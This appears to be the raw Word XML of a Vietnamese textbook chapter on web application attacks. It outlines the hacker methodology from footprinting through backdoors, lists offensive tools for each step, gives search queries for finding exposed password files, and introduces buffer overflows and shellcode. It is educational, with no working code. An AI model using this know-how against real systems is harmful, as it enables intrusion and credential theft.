          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc59634013"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Thu thập thông tin</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="1717EC8E" w14:textId="16D61ADB"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1: FootPrinting (thu thập thông tin):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC97244" w14:textId="77777777" w:rsid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 xml:space="preserve">Đây là cách mà hacker làm khi muốn lấy một lượng thông tin tối đa về máy chủ/doanh nghiệp/người dùng, bao gồm chi tiết về địa chỉ IP, Whois, DNS..v.v </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6E769A" w14:textId="6E82010C"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là những thông tin chính thức có liên quan đến mục tiêu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C677A7" w14:textId="7A1A616C"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ông cụ hỗ trợ: UseNet , search engines (công cụ tìm kiếm) , Edgar Any Unix client, http://www.networksolutions.com/whois, nslookup Is -d , Sam spade, http://www.arin.net/whois, dig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE9227A" w14:textId="1255CC72"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2: Scanning (Quét thăm dò):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DC6FDF" w14:textId="5EE5C4FD"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Phần lớn thông tin quan trọng từ server có được từ bước này , bao gồm quét cổng, xác định hệ điều hành, .v.v.. để biết các port trên server, nghe đường dữ liệu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABC97C7" w14:textId="77777777" w:rsidR="00221579" w:rsidRPr="00221579" w:rsidRDefault="00221579" w:rsidP="00E42092">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="978"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F634F26" w14:textId="59ADC955"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lastRenderedPageBreak/>
        <w:t>Các công cụ: fping, icmpenum Ws_ping ProPack, nmap, SuperScan, fscan nmap, queso, siphon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1110C48E" w14:textId="4775E1D6"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3: Enumeration (liệt kê tìm lỗ hổng):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071F4C9D" w14:textId="7E3C858A"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thứ ba là tìm  kiếm  những  tài  nguyên  được  bảo  vệ  kém,  hoạch  tài  khoản người dùng mà có thể sử dụng  để  xâm  nhập,  bao  gồm  các  mật  khẩu mặc định, các script và dịch vụ mặc định.  Rất  nhiều  người  quản  trị  mạng  không biết đến hoặc không sửa đổi lại các giá trị này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9405C1" w14:textId="5D13A887"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ác công cụ phụ trợ: null sessions, DumpACL, sid2user, OnSite Admin showmount, NAT Legion banner grabbing với telnet, netcat, rpcinfo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAD8100" w14:textId="3D14CD77"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4: Gaining access (Tìm cách xâm nhập):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4007047D" w14:textId="154F272D"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ây giờ hacker sẽ  tìm  cách  truy  cập  vào  mạng  bằng  những  thông  tin  có  được  ở  ba  bước  trên.  Phương  pháp  được  sử  dụng  ở  đây  có  thể  là   tấn   công vào lỗi tràn bộ đệm, lấy và giải mã file password, hay brute force (kiểm tra  tất cả các trường hợp) password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143238CA" w14:textId="6016A3EB"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ác công cụ: tcpdump, L0phtcrack readsmb, NAT, legion, tftp, pwdump2 (NT) ttdb, bind, IIS, HTR/ISM.DLL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B9514E" w14:textId="5A2DA227"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5: Escalating privilege (Leo thang đặc quyền):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07213850" w14:textId="77777777" w:rsid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rong trường hợp hacker xâm nhập đựợc vào mạng với một tài khoản nào đó, thì họ sẽ tìm cách kiểm soát toàn bộ hệ thống. Hacker sẽ tìm cách crack password    của admin, hoặc sử dụng lỗ hổng để leo thang đặc quyền.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6CE286" w14:textId="706099FB"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John và Riper là hai chương trình crack password rất hay được sử dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E75C0FE" w14:textId="4DD0D52B" w:rsidR="00221579" w:rsidRPr="008872A1"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ông cụ: L0phtcrack, Ic_messages, getadmin, sechole.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653E5EEB" w14:textId="2045B639"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6: Pilfering (Dùng khi các file chứa pass bị sơ hở):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036299D5" w14:textId="3115DF53"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hêm một lần nữa các máy tìm kiếm  lại  đựơc  sử  dụng  để  tìm  các  phương  pháp truy cập vào mạng. Những file text chứa password hay các cơ chế không an toàn khác có thể là đích cho hacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E88DB9" w14:textId="5BE64CE1"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hông tin lấy từ bước trên đủ để ta định vị server và điều khiển server. Nếu bước này không thành công, đến bước &lt;9&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587F7491" w14:textId="27057B4A"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ông cụ hỗ trợ: rhost, LSA Secrets user data, configuration files, Registry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA7CC39" w14:textId="796E120C" w:rsidR="00221579" w:rsidRPr="00017D29"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7: Covering Tracks (Xoá dấu vết) :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4190A9C2" w14:textId="6F0B3D0D"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lastRenderedPageBreak/>
        <w:t>Sau khi đã có những thông tin cần thiết, hacker tìm cách xoá dấu vết, xoá các file log của hệ điều hành làm cho người quản lý không nhận ra hệ thống đã bị xâm  nhập hoặc có biết cũng không tìm ra kẻ xâm nhập là ai.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE9739A" w14:textId="39BC9119" w:rsidR="00221579" w:rsidRPr="008872A1"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Xóa log. Công cụ: Zap, Event log GUI, rootkits, file streaming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0CDE2A" w14:textId="372DC3FB" w:rsidR="00221579" w:rsidRPr="008872A1" w:rsidRDefault="00221579" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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Bước 8: Creating Backdoors (Tạo cửa sau chuẩn bị cho lần xâm nhập tiếp theo</w:t>
      </w:r>
      <w:r w:rsidR="00017D29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00017D29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>được</w:t>
      </w:r>
      <w:r w:rsidR="00017D29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00017D29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dễ dàng hơn):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364A54DF" w14:textId="35563826"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Hacker để lại "Back Doors", tức là một cơ chế cho phép hacker truy nhập trở lại bằng con đường bí mật không phải tốn nhiều công sức, bằng việc cài đặt Trojan hay tạo user mới (đối với tổ chức có nhiều user).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3A5F1C" w14:textId="404E5595"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ông cụ ở đây là các loại Trojan, keylog, creat rogue user accounts, schedule   batch jobs, infect startup files, plant remote control services, install monitoring mechanisms, replace apps with Trojan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4422BA35" w14:textId="26549CBE" w:rsidR="00221579" w:rsidRPr="00017D29" w:rsidRDefault="00221579" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="978"/>
        </w:tabs>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Công cụ: members of wheel, administrators cron, At rc, Startup folder, registry keys, netcat, remote.exe, VNC, BO2K, keystroke loggers, add acct to secadmin mail aliases login, fpnwclnt.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAA621F" w14:textId="1510B3BA" w:rsidR="00903C21" w:rsidRDefault="00903C21" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc59634014"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Khảo sát ứng dụng web</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="435B4AB3" w14:textId="53113087" w:rsidR="00221579" w:rsidRP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Phương pháp khảo sát khá phổ biến, đó là Xem mã nguồn và lợi dụng các lỗi cho phép xem mã nguồn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAB099A" w14:textId="157D71A7" w:rsidR="00221579" w:rsidRP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Một số ngôn ngữ web thông dụng hiện nay có nhiều lỗi này như Active Server Pages (ASP), Common Gateway Interface (CGI), ColdFusion Server (CFM), Hypertext Preprocessor (PHP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8B0A31" w14:textId="6A86D1EF" w:rsidR="00221579" w:rsidRP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ìm các site bị  lỗi này bằng cách dùng www.google.com, search từ khóa liên quan.  Sử dụng allinurl: trước đoạn string đặc biệt cần kiếm, thì những trang Web tìm kiếm được chắc chắn sẽ có chuỗi cần tìm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235E9D83" w14:textId="35561A55" w:rsidR="00221579" w:rsidRP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 xml:space="preserve">Ví dụ 1: "allinurl:/advadmin" (không có ngoặc kép) thì chỉ liệt kê ra những   trang có URL có dạng : </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidR="00017D29" w:rsidRPr="006062A7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://tentrangweb.com/advadmin</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00017D29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063F5119" w14:textId="63400059" w:rsidR="00221579" w:rsidRPr="00017D29" w:rsidRDefault="00221579" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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ìm các file trên http://www.google.com thì thêm chữ type file: trước tên file cần tìm trên các chuyên khu web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4616EF71" w14:textId="2884116E" w:rsidR="00221579" w:rsidRP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 xml:space="preserve">Ví dụ </w:t>
      </w:r>
      <w:r w:rsidR="00017D29" w:rsidRPr="00017D29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00017D29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCB9B8C" w14:textId="160375CA" w:rsidR="00221579" w:rsidRPr="00017D29" w:rsidRDefault="00221579" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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Muốn tìm file mdb (đây là file chứa mật khẩu của các trang Web, dùng Access để</w:t>
      </w:r>
      <w:r w:rsidR="00017D29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00017D29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mở) thì vào http://www.google.com và đánh type file:mdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDAA734" w14:textId="3216A2C1" w:rsidR="00221579" w:rsidRPr="00017D29" w:rsidRDefault="00221579" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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lastRenderedPageBreak/>
        <w:t>Tìm file SAM (đây là file chứa Password của Windows NT, dùng L0phtCrack để</w:t>
      </w:r>
      <w:r w:rsidR="00017D29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00017D29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Crack) thì vào http://www.google.com và đánh type file:SAM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76584A86" w14:textId="77777777" w:rsid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ấn công vượt qua các cơ chế kiểm soát (authentication, authorization)</w:t>
      </w:r>
      <w:r w:rsidR="00017D29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00017D29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bao gồm các phương pháp như đoán mật khẩu, thay đổi thông tin cookies, các kĩ thuật directory traversal, leo thang đặc quyền, các phương pháp tấn công dựa vào SQL, SQL injection...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0ED651" w14:textId="6740A263" w:rsid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ìm hiểu sâu về các chức năng của ứng dụng web</w:t>
      </w:r>
      <w:r w:rsidR="00017D29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBD1790" w14:textId="77777777" w:rsidR="00017D29"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ìm hiểu cách thực hiện của các phần trong ứng dụng, đặc biệt như các order  input, confirmation, order tracking. Ở đây ta có thể áp dụng các phương pháp như SQL Injection, input validation...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A37F13" w14:textId="77777777" w:rsid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017D29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tìm hiểu luồng di chuyển của thông ti</w:t>
      </w:r>
      <w:r w:rsidR="00DA0BCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5A4E15" w14:textId="7F5BE4F0" w:rsidR="00221579" w:rsidRPr="00E42092"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Các thông tin tương tác giữa client và server, các thông tin tương tác với database. Hiện nay việc viết mã để thực hiện việc giao tiếp thông tin thường phải đảm bảo được tính hiệu quả (nhanh), và bảo mật (có thể  sẽ  chậm hơn). Thường thì  tính hiệu quả được ưu tiên hơn do đó có thể sẽ phát sinh lỗi trong quá trình đó và giúp hacker có thể lợi dụng các lỗi như SQL input...để đoạt quyền điều khiển hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5945F2" w14:textId="2E475AF8" w:rsidR="00221579" w:rsidRPr="00DA0BCA" w:rsidRDefault="005E1B43"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1" w:name="_Toc59634015"/>
      <w:r w:rsidR="00903C21">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tấn công</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="5376C5D0" w14:textId="4C53C9F8" w:rsidR="00221579" w:rsidRP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Sau khi đã thu thập và khảo sát kỹ càng đối tượng, hacker bắt đầu thực hiện tấn công nhằm xâm nhập vào hệ thống lấy thông tin, đưa thông tin xấu vào, dành quyền kiểm soát,… Còn nếu không thành công trong việc xâm nhập, thì Dos là cách thức cuối  cùng mà hacker thường lựa chọn để làm cho hệ thống không thể hoạt đông được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A29533" w14:textId="77777777" w:rsid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Nhận xét:</w:t>
      </w:r>
      <w:r w:rsidR="00DA0BCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03818926" w14:textId="77777777" w:rsidR="00DA0BCA" w:rsidRDefault="00221579"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Việc thu thập thông tin là vô cùng quan trọng cho việc tấn công vào một hệ thống</w:t>
      </w:r>
      <w:r w:rsidR="00DA0BCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA0BCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>máy đích. Cho dù hacker tấn công theo phương diện phần cứng hay qua ứng dụng thì việc thu thập vẫn là cần thiết. Vấn đề là việc thực hiện sẽ theo từng bước như thế nào. Có thể trong những bước đã nêu hacker không cần phải đi qua theo thứ tự hay qua</w:t>
      </w:r>
      <w:r w:rsidR="00DA0BCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA0BCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hết, nhưng việc nắm rõ thông tin của máy đích luôn là điều kiện tiên quyết để dẫn đến thành công trong việc tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3435BF5B" w14:textId="47863A90" w:rsidR="00221579" w:rsidRPr="00DA0BCA" w:rsidRDefault="00221579"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 xml:space="preserve">Tùy vào nội dung thông tin mà hacker thu thập được mà hacker sẽ quyết định tấn  công theo kĩ thuật nào. Do đó, việc bảo mật cho một hệ thống cần đòi hỏi sự kết hợp không chỉ của riêng nhà quản trị hệ thống mà còn của nhà thiết kế </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA0BCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ứng dụng và sự   hợp tác của cả những khách hàng sử dụng ứng dụng. Nhiệm vụ này sẽ được đề cập rõ hơn trong chương 12.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C71361A" w14:textId="54587DE6" w:rsidR="00A80D11" w:rsidRPr="00903C21" w:rsidRDefault="00A80D11" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc59634016"/>
      <w:r w:rsidRPr="00903C21">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Một số kiểu tấn công Ứng dụng web</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="6100291D" w14:textId="40D17F62" w:rsidR="00A80D11" w:rsidRDefault="00903C21"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3" w:name="_Toc59634017"/>
      <w:r w:rsidR="00A80D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tràn bộ đệm (Buffer Overflow)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="42B736AA" w14:textId="38B9BE7E" w:rsidR="00A80D11" w:rsidRDefault="00A80D11" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc59634018"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Khái niệm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="5A3737BD" w14:textId="77777777" w:rsid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Buffer overflow đã từng là lỗ hổng trong hệ thống bảo mật của UNIX từ nhiều năm nay nhưng chỉ được công bố sau buổi thảo luận của Dr. Mudge trong tài liệu 1995 “ Bằng cách nào viết một chương trình khai thác lỗ hổng Buffer Overflow”(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43860EF6" w14:textId="77777777" w:rsid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Với kĩ thuật Buffer Overflow, cho phép một số lượng lớn dữ liệu được cung cấp bởi người dùng mà vượt quá lượng bộ nhớ cấp phát ban đầu bởi ứng dụng do đó gây cho hệ thống lâm vào tình trạng tràn bộ nhớ, thậm chí có thể bị chèn thêm một đoạn mã  bất kì. Nếu ứng dụng được cấu hình để được thực thi như root thì người tấn công có thể thao tác như một nhà quản trị hệ thống của web server. Hầu hết những vấn đề đều phát sinh từ khả năng lập trình yếu kém của những nhà lập trình. Đơn cử là sự cẩu thả trong kiểm tra kích thước dữ liệu nhập vào</w:t>
      </w:r>
      <w:r w:rsidR="00DA0BCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3A2CCD" w14:textId="3BB1EC01" w:rsidR="00221579" w:rsidRP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Kỹ thuật khai thác lỗi tràn bộ đệm (buffer overflow exploit) được xem là một trong những kỹ thuật hacking kinh điển nhất. Chương 5 được chia làm 2 phần:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC3C227" w14:textId="31E08884" w:rsidR="00221579" w:rsidRPr="00DA0BCA" w:rsidRDefault="00221579"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Phần 1: Tổ chức bộ nhớ, stack, gọi hàm, shellcode. Giới thiệu tổ chức bộ nhớ của một tiến trình (process), các thao tác trên bộ nhớ stack khi gọi hàm và kỹ thuật cơ bản để tạo shellcode - đoạn mã thực thi một giao tiếp dòng lệnh (shell).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A1E365" w14:textId="050C90A9" w:rsidR="00221579" w:rsidRPr="00E42092" w:rsidRDefault="00221579"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Phần 2: Kỹ thuật khai thác lỗi tràn bộ đệm. Giới thiệu kỹ thuật tràn bộ đệm cơ   bản, tổ chức shellcode, xác định địa chỉ trả về, địa chỉ shellcode, cách  truyền  shellcode cho chương trình bị lỗi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0914D609" w14:textId="67C4FDE2" w:rsidR="00221579" w:rsidRPr="00DA0BCA" w:rsidRDefault="00221579"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Các chi tiết kỹ thuật minh hoạ ở đây được thực hiện trên môi trường Linux x86  (kernel 2.2.20, glibc-2.1.3), tuy nhiên về mặt lý thuyết có thể áp dụng cho bất kỳ môi trường nào khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED00ADF" w14:textId="72A2575C" w:rsidR="006B3B79" w:rsidRDefault="006B3B79" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc59634019"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sơ đồ tổ chức bộ nhớ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="6FA8DF20" w14:textId="12BCAE54" w:rsidR="00233B56" w:rsidRPr="00DA0BCA" w:rsidRDefault="00233B56"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Mỗi tiến trình thực thi đều được hệ điều hành cấp cho một không gian bộ nhớ ảo (logic) giống nhau. Không gian nhớ này gồm 3 vùng: text, data và stack. Ý nghĩa của  3 vùng này như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C84BA5F" w14:textId="10C0733B" w:rsidR="00233B56" w:rsidRPr="00DA0BCA" w:rsidRDefault="00233B56"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lastRenderedPageBreak/>
